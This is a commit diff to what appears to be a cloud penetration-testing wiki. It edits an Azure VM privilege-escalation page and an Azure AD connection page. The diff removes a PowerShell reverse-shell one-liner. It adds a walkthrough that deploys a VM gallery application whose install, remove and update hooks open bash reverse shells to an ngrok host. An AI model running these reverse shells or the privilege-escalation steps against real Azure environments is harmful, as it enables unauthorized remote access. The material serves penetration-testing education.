Skip to content

Commit 049e108

Browse files
committed
fix
1 parent d448ce4 commit 049e108

2 files changed

Lines changed: 104 additions & 6 deletions

File tree

src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md

Lines changed: 103 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -232,11 +232,6 @@ export URL_PACKAGE=$(az storage blob generate-sas \
232232
--https-only \
233233
--full-uri \
234234
-o tsv)
235-
236-
# Alternative commands for Powrhsell reverse shell
237-
## Note that this would be detected by Defender (but it's an extarting point)
238-
## Add in the install, remove and update commands
239-
echo '$client = New-Object System.Net.Sockets.TCPClient(\"6.tcp.eu.ngrok.io\",19507);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
240235
```
241236

242237
{{#endtab }}
@@ -280,6 +275,109 @@ az vm application set \
280275
--name deleteme-win4 \
281276
--app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellAppWin/versions/1.0.0 \
282277
--treat-deployment-as-failure true
278+
279+
# You can create a SAS URL from a blob with something like:
280+
export EXPIRY=$(date -u -v +1d '+%Y-%m-%dT%H:%MZ')
281+
export URL_PACKAGE=$(az storage blob generate-sas \
282+
--account-name <acc-name> \
283+
--container-name <container-name> \
284+
--name <filename> \
285+
--permissions r \
286+
--expiry "$EXPIRY" \
287+
--https-only \
288+
--full-uri \
289+
-o tsv)
290+
```
291+
292+
{{#endtab }}
293+
294+
{{#tab name="Az" }}
295+
296+
```bash
297+
##### GET VM #####
298+
299+
Get-AzVm
300+
# Check that location is "Central US", the gallery and app mUST be in the same location
301+
302+
$vmName="vm-name"
303+
304+
305+
306+
##### CREATE SAS TOKEN TO USE IN A USELESS BLOB #####
307+
308+
$rg="rg-name"
309+
310+
# Get and set storage account
311+
Get-AzStorageAccount
312+
313+
$accountName = "account-name"
314+
315+
# Get and set container inside the storage
316+
Get-AzStorageContainer -Context (Get-AzStorageAccount -name $accountName -ResourceGroupName $rg).context
317+
318+
$containerName = "container-name"
319+
320+
# Upload dummy file
321+
$key = (Get-AzStorageAccountKey -ResourceGroupName $rg -Name $accountName)[0].Value
322+
$ctx = New-AzStorageContext -StorageAccountName $accountName -StorageAccountKey $key
323+
echo "test" > /tmp/test.txt
324+
$blobName = "test.txt"
325+
Set-AzStorageBlobContent -File /tmp/test.txt -Container $containerName -Blob "$blobName" -Context $ctx
326+
327+
# Generate SAS token
328+
$expiry = (Get-Date).ToUniversalTime().AddDays(1).ToString("yyyy-MM-ddTHH:mmZ")
329+
$sasToken = New-AzStorageBlobSASToken `
330+
-Container $containerName `
331+
-Blob $blobName `
332+
-Permission r `
333+
-ExpiryTime $expiry `
334+
-FullUri `
335+
-Context $ctx
336+
337+
338+
339+
##### CREATE GALLERY AND APP #####
340+
341+
$rg = "rg-name"
342+
$location = "Central US"
343+
$galleryName = "myGallery"
344+
$appName = "myReverseShellApp"
345+
$subscription="subscription-id"
346+
347+
# Create gallery
348+
New-AzGallery -ResourceGroupName $rg -Name $galleryName -Location $location
349+
350+
# Create app in gallery
351+
New-AzGalleryApplication `
352+
-ResourceGroupName $rg `
353+
-GalleryName $galleryName `
354+
-Name $appName `
355+
-Location $location `
356+
-SupportedOSType Linux
357+
358+
359+
# Create app version
360+
$versionName = "1.0.2"
361+
## create ngrok listener
362+
363+
New-AzGalleryApplicationVersion `
364+
-ResourceGroupName $rg `
365+
-GalleryName $galleryName `
366+
-GalleryApplicationName $appName `
367+
-Name $versionName `
368+
-Location $location `
369+
-PackageFileLink "$sasToken" `
370+
-Install "bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/19334 0>&1'" `
371+
-Remove "bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/19334 0>&1'" `
372+
-Update "bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/19334 0>&1'"
373+
374+
375+
# Launch app
376+
$appVersionId = "/subscriptions/$subscription/resourceGroups/$rg/providers/Microsoft.Compute/galleries/$galleryName/applications/$appName/versions/$versionName"
377+
$app = New-AzVmGalleryApplication -PackageReferenceId $appVersionId
378+
$vm = Get-AzVM -ResourceGroupName $rg -Name $vmName
379+
Add-AzVmGalleryApplication -VM $vm -GalleryApplication $app
380+
Update-AzVM -ResourceGroupName $rg -VM $vm
283381
```
284382

285383
{{#endtab }}

src/pentesting-cloud/azure-security/az-services/az-azuread.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -101,7 +101,7 @@ Connect-AzAccount -Credential $creds
101101

102102
# Connect with access token
103103
Connect-AzAccount -AccountId test@corp.onmicrosoft.com [-AccessToken $ManagementToken] [-GraphAccessToken $AADGraphToken] [-MicrosoftGraphAccessToken $MicrosoftGraphToken] [-KeyVaultAccessToken $KeyVaultToken]
104-
# If connecting with some metadata token just use "-AccountId asdasd@example.com" and it will work
104+
# If connecting with some metadata token, in "-AccountId" put the OID of the managed identity (get it from the JWT token)
105105

106106
# Connect with Service principal/enterprise app secret
107107
$password = ConvertTo-SecureString 'KWEFNOIRFIPMWL.--DWPNVFI._EDWWEF_ADF~SODNFBWRBIF' -AsPlainText -Force

0 commit comments

Comments
 (0)